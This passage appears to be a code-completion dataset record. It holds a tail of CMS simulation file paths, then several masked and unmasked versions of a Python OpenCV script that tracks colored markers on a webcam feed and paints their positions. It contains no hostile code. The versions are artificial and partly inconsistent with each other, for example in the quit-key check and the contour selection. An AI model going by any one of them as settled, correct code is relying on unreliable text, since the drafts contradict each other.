'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root' ] );\n\n\nsecFiles.extend( [\n ] )\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def find_color(img, color_value, myColors):
    """Detect each configured HSV color range in *img*.

    Marks every detection on the global ``frame_copy`` overlay and returns
    the detected tip positions.

    Parameters:
        img: BGR frame to scan.
        color_value: BGR draw colors, parallel to ``myColors``.
        myColors: list of [h_min, s_min, v_min, h_max, s_max, v_max] ranges.

    Returns:
        List of [x, y, color_index] entries, one per color actually found.
    """
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    new_points = []
    for count, color in enumerate(myColors):
        lower = np.array(color[0:3])
        upper = np.array(color[3:6])
        mask = cv2.inRange(hsv, lower, upper)
        x, y = contour_detect(mask)
        # (0, 0) is the "nothing found" sentinel from contour_detect.
        # Only draw and record real detections — the original drew a blob
        # at the top-left corner whenever a color was absent.
        if x != 0 and y != 0:
            cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
            new_points.append([x, y, count])
    return new_points
def contour_detect(mask):
    """Locate the pen tip in a binary *mask*.

    Picks the largest contour whose area exceeds 100 px (the original kept
    whichever qualifying contour OpenCV happened to list last, which is an
    arbitrary choice) and returns the top-center of its bounding box — the
    natural drawing tip of an upright marker.

    Returns:
        (x, y) of the tip, or (0, 0) if no contour is large enough.
    """
    x, y, w, h = 0, 0, 0, 0
    best_area = 100  # minimum area threshold; ignore specks of noise
    contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                           cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        if area > best_area:
            best_area = area
            perimeter = cv2.arcLength(cnt, True)
            approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
            x, y, w, h = cv2.boundingRect(approx)
    return x + w // 2, y
def canvas(my_points, color_value):
    """Replay every stored stroke point onto the global ``frame_copy``."""
    for px, py, color_index in my_points:
        cv2.circle(frame_copy, (px, py), 15, color_value[color_index], -1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cap.set(3, frameWidth)   # property 3 = CAP_PROP_FRAME_WIDTH
cap.set(4, frameHeight)  # property 4 = CAP_PROP_FRAME_HEIGHT
cap.set(10, 150)         # property 10 = CAP_PROP_BRIGHTNESS
<|reserved_special_token_0|>
def find_color(img, color_value, myColors):
    """Detect each configured HSV color range in *img*.

    Marks every detection on the global ``frame_copy`` overlay and returns
    the detected tip positions.

    Parameters:
        img: BGR frame to scan.
        color_value: BGR draw colors, parallel to ``myColors``.
        myColors: list of [h_min, s_min, v_min, h_max, s_max, v_max] ranges.

    Returns:
        List of [x, y, color_index] entries, one per color actually found.
    """
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    new_points = []
    for count, color in enumerate(myColors):
        lower = np.array(color[0:3])
        upper = np.array(color[3:6])
        mask = cv2.inRange(hsv, lower, upper)
        x, y = contour_detect(mask)
        # (0, 0) is the "nothing found" sentinel from contour_detect.
        # Only draw and record real detections — the original drew a blob
        # at the top-left corner whenever a color was absent.
        if x != 0 and y != 0:
            cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
            new_points.append([x, y, count])
    return new_points
def contour_detect(mask):
    """Locate the pen tip in a binary *mask*.

    Picks the largest contour whose area exceeds 100 px (the original kept
    whichever qualifying contour OpenCV happened to list last, which is an
    arbitrary choice) and returns the top-center of its bounding box — the
    natural drawing tip of an upright marker.

    Returns:
        (x, y) of the tip, or (0, 0) if no contour is large enough.
    """
    x, y, w, h = 0, 0, 0, 0
    best_area = 100  # minimum area threshold; ignore specks of noise
    contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                           cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        if area > best_area:
            best_area = area
            perimeter = cv2.arcLength(cnt, True)
            approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
            x, y, w, h = cv2.boundingRect(approx)
    return x + w // 2, y
def canvas(my_points, color_value):
    """Replay every stored stroke point onto the global ``frame_copy``."""
    for px, py, color_index in my_points:
        cv2.circle(frame_copy, (px, py), 15, color_value[color_index], -1)
# Main capture loop: read, detect, accumulate strokes, display.
while True:
    ret, frame = cap.read()
    if not ret:
        # Camera feed ended or grab failed; flipping None would crash.
        break
    frame = cv2.flip(frame, 1)  # mirror so on-screen motion matches the hand
    frame_copy = frame.copy()   # overlay that find_color/canvas draw onto
    new_point = find_color(frame, color_value, myColors)
    if len(new_point) != 0:
        for i in new_point:
            my_points.append(i)
    if len(my_points) != 0:
        canvas(my_points, color_value)
    cv2.imshow('frame', frame_copy)
    # The original used `cv2.waitKey(1) and 255 == ord('q')`, which is
    # always False (255 != ord('q')), so pressing 'q' could never quit.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()  # free the camera before tearing down the windows
cv2.destroyAllWindows()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Capture dimensions for the webcam feed.
frameWidth = 640
frameHeight = 480
cap = cv2.VideoCapture(0)  # default (first) webcam
cap.set(3, frameWidth)   # property 3 = CAP_PROP_FRAME_WIDTH
cap.set(4, frameHeight)  # property 4 = CAP_PROP_FRAME_HEIGHT
cap.set(10, 150)         # property 10 = CAP_PROP_BRIGHTNESS
# HSV detection ranges, one per trackable color:
# [h_min, s_min, v_min, h_max, s_max, v_max]
myColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,
    90, 90, 41, 255, 255]]
# BGR draw colors, parallel to myColors.
color_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]
x, y, w, h = 0, 0, 0, 0  # bounding-box scratch values
my_points = []  # accumulated strokes as [x, y, color_index]
def find_color(img, color_value, myColors):
    """Detect each configured HSV color range in *img*.

    Marks every detection on the global ``frame_copy`` overlay and returns
    the detected tip positions.

    Parameters:
        img: BGR frame to scan.
        color_value: BGR draw colors, parallel to ``myColors``.
        myColors: list of [h_min, s_min, v_min, h_max, s_max, v_max] ranges.

    Returns:
        List of [x, y, color_index] entries, one per color actually found.
    """
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    new_points = []
    for count, color in enumerate(myColors):
        lower = np.array(color[0:3])
        upper = np.array(color[3:6])
        mask = cv2.inRange(hsv, lower, upper)
        x, y = contour_detect(mask)
        # (0, 0) is the "nothing found" sentinel from contour_detect.
        # Only draw and record real detections — the original drew a blob
        # at the top-left corner whenever a color was absent.
        if x != 0 and y != 0:
            cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
            new_points.append([x, y, count])
    return new_points
def contour_detect(mask):
    """Locate the pen tip in a binary *mask*.

    Picks the largest contour whose area exceeds 100 px (the original kept
    whichever qualifying contour OpenCV happened to list last, which is an
    arbitrary choice) and returns the top-center of its bounding box — the
    natural drawing tip of an upright marker.

    Returns:
        (x, y) of the tip, or (0, 0) if no contour is large enough.
    """
    x, y, w, h = 0, 0, 0, 0
    best_area = 100  # minimum area threshold; ignore specks of noise
    contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                           cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        if area > best_area:
            best_area = area
            perimeter = cv2.arcLength(cnt, True)
            approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)
            x, y, w, h = cv2.boundingRect(approx)
    return x + w // 2, y
def canvas(my_points, color_value):
    """Replay every stored stroke point onto the global ``frame_copy``."""
    for px, py, color_index in my_points:
        cv2.circle(frame_copy, (px, py), 15, color_value[color_index], -1)
# Main capture loop: read, detect, accumulate strokes, display.
while True:
    ret, frame = cap.read()
    if not ret:
        # Camera feed ended or grab failed; flipping None would crash.
        break
    frame = cv2.flip(frame, 1)  # mirror so on-screen motion matches the hand
    frame_copy = frame.copy()   # overlay that find_color/canvas draw onto
    new_point = find_color(frame, color_value, myColors)
    if len(new_point) != 0:
        for i in new_point:
            my_points.append(i)
    if len(my_points) != 0:
        canvas(my_points, color_value)
    cv2.imshow('frame', frame_copy)
    # The original used `cv2.waitKey(1) and 255 == ord('q')`, which is
    # always False (255 != ord('q')), so pressing 'q' could never quit.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()  # free the camera before tearing down the windows
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
# Capture dimensions for the webcam feed.
frameWidth = 640
frameHeight = 480
cap = cv2.VideoCapture(0)  # default (first) webcam
cap.set(3, frameWidth)   # property 3 = CAP_PROP_FRAME_WIDTH
cap.set(4, frameHeight)  # property 4 = CAP_PROP_FRAME_HEIGHT
cap.set(10, 150)         # property 10 = CAP_PROP_BRIGHTNESS
# HSV detection ranges, one per trackable color:
# [h_min, s_min, v_min, h_max, s_max, v_max]
myColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,
    90, 90, 41, 255, 255]]
# BGR draw colors, parallel to myColors.
color_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]
x, y, w, h = 0, 0, 0, 0  # bounding-box scratch values
my_points = []  # accumulated strokes as [x, y, color_index]
def find_color(img, color_value, myColors):
    """Detect each configured HSV color range in *img*.

    Marks every detection on the global ``frame_copy`` overlay and returns
    the detected tip positions.

    Parameters:
        img: BGR frame to scan.
        color_value: BGR draw colors, parallel to ``myColors``.
        myColors: list of [h_min, s_min, v_min, h_max, s_max, v_max] ranges.

    Returns:
        List of [x, y, color_index] entries, one per color actually found.
    """
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    new_points = []
    for count, color in enumerate(myColors):
        lower = np.array(color[0:3])
        upper = np.array(color[3:6])
        mask = cv2.inRange(hsv, lower, upper)
        x, y = contour_detect(mask)
        # (0, 0) is the "nothing found" sentinel from contour_detect.
        # Only draw and record real detections — the original drew a blob
        # at the top-left corner whenever a color was absent.
        if x != 0 and y != 0:
            cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)
            new_points.append([x, y, count])
    return new_points
def contour_detect(mask):
    """Return the top-center of the last contour on ``mask`` with area > 100.

    Falls back to (0, 0) when no contour on the mask is large enough.
    """
    x = y = w = h = 0
    contours, _hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                            cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        if cv2.contourArea(cnt) > 100:
            poly = cv2.approxPolyDP(cnt, 0.01 * cv2.arcLength(cnt, True), True)
            x, y, w, h = cv2.boundingRect(poly)
    return x + w // 2, y
def canvas(my_points, color_value):
    """Redraw every recorded stroke point onto the shared ``frame_copy``."""
    for px, py, color_idx in my_points:
        cv2.circle(frame_copy, (px, py), 15, color_value[color_idx], -1)
# Main capture loop: grab a frame, detect the configured colors, record
# their positions, and replay every recorded point as a "paint" overlay.
while True:
    ret, frame = cap.read()
    if not ret:
        # Frame grab failed (camera unplugged?); cv2.flip(None, 1) would
        # raise, so stop cleanly instead.
        break
    frame = cv2.flip(frame, 1)  # mirror so on-screen motion matches the user
    frame_copy = frame.copy()
    new_point = find_color(frame, color_value, myColors)
    if len(new_point) != 0:
        for i in new_point:
            my_points.append(i)
    if len(my_points) != 0:
        canvas(my_points, color_value)
    cv2.imshow('frame', frame_copy)
    # Bug fix: the original tested `cv2.waitKey(1) and 255 == ord('q')`,
    # which is always False (255 != ord('q')), so 'q' never quit. The
    # correct idiom masks the returned key code with bitwise & 0xFF.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()  # release the webcam handle (was leaked before)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
# Requested capture resolution for the webcam stream.
frameWidth = 640
frameHeight = 480
# capturing Video from Webcam
cap = cv2.VideoCapture(0)
cap.set(3, frameWidth)  # 3 == cv2.CAP_PROP_FRAME_WIDTH
cap.set(4, frameHeight)  # 4 == cv2.CAP_PROP_FRAME_HEIGHT
cap.set(10, 150)  # 10 == cv2.CAP_PROP_BRIGHTNESS
# HSV detection ranges ([hMin, sMin, vMin, hMax, sMax, vMax]), one row per
# trackable color.
myColors = [[20,40,40,70,255,255],
            [100,169,121,135,255,255],
            [0, 90, 90, 41, 255, 255]]
# BGR draw color for each row of myColors, parallel to it.
color_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]
x, y, w, h = 0, 0, 0, 0
# Accumulated [x, y, color_index] paint points across frames.
my_points = []
def find_color(img, color_value, myColors):
    """Scan one BGR frame for each configured HSV color range.

    For every entry in ``myColors`` the frame is thresholded in HSV space,
    the tip of the largest matching contour is located, and a filled marker
    is drawn on the module-level ``frame_copy`` overlay.

    :param img: BGR frame as captured from the webcam.
    :param color_value: BGR draw colors, parallel to ``myColors``.
    :param myColors: list of ``[hMin, sMin, vMin, hMax, sMax, vMax]`` bounds.
    :return: list of ``[x, y, color_index]`` entries, one per detected color.
    """
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    count = 0
    new_points = []
    for color in myColors:
        lower = np.array(color[0:3])
        upper = np.array(color[3:6])
        mask = cv2.inRange(hsv, lower, upper)
        x, y = contour_detect(mask)
        # NOTE(review): the marker is drawn even when (x, y) == (0, 0),
        # i.e. when nothing was detected -- confirm this is intended.
        cv2.circle(frame_copy, (x,y), 20,color_value[count], -1)
        if x != 0 and y != 0:  # (0, 0) is the "no contour found" sentinel
            new_points.append([x,y,count])
        count += 1
    return new_points
def contour_detect(mask):
    """Locate the top-center point of the last large-enough contour in a mask.

    :param mask: binary mask produced by ``cv2.inRange``.
    :return: ``(x + w // 2, y)`` of the bounding rect of the last contour
        whose area exceeds 100 px; ``(0, 0)`` when no contour qualifies.
    """
    x,y,w,h = 0, 0, 0, 0
    # NOTE(review): two-value unpacking assumes the OpenCV 4 return
    # signature (contours, hierarchy); OpenCV 3 returns three values.
    contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        if area > 100:  # ignore small noise blobs
            perimeter = cv2.arcLength(cnt, True)
            # Simplify the contour (1% perimeter tolerance) before taking
            # its bounding rectangle.
            approx = cv2.approxPolyDP(cnt, 0.01*perimeter, True)
            x, y, w, h = cv2.boundingRect(approx)
    return x + w // 2, y
def canvas(my_points, color_value):
    """Replay all stored paint points onto the module-level ``frame_copy``.

    :param my_points: accumulated ``[x, y, color_index]`` entries.
    :param color_value: BGR draw colors indexed by ``color_index``.
    """
    for point in my_points:
        cv2.circle(frame_copy, (point[0], point[1]),
                   15, color_value[point[2]], -1)
# Main capture loop: grab a frame, detect the configured colors, record
# their positions, and replay every recorded point as a "paint" overlay.
while True:
    ret, frame = cap.read()
    if not ret:
        # Frame grab failed (camera unplugged?); cv2.flip(None, 1) would
        # raise, so stop cleanly instead.
        break
    frame = cv2.flip(frame, 1)  # mirror so on-screen motion matches the user
    frame_copy = frame.copy()
    new_point = find_color(frame, color_value, myColors)
    if len(new_point) != 0:
        for i in new_point:
            my_points.append(i)
    if len(my_points) != 0:
        canvas(my_points, color_value)
    cv2.imshow('frame', frame_copy)
    # Bug fix: `cv2.waitKey(1) and 0xFF == ord('q')` is always False
    # (0xFF != ord('q')), so 'q' could never quit; the key code must be
    # masked with bitwise & instead of the boolean `and`.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()  # release the webcam handle (was leaked before)
cv2.destroyAllWindows()
|
flexible
|
{
"blob_id": "836c1d2083d18c68fe551278d2df4155edc64c8c",
"index": 5298,
"step-1": "<mask token>\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\n<mask token>\n",
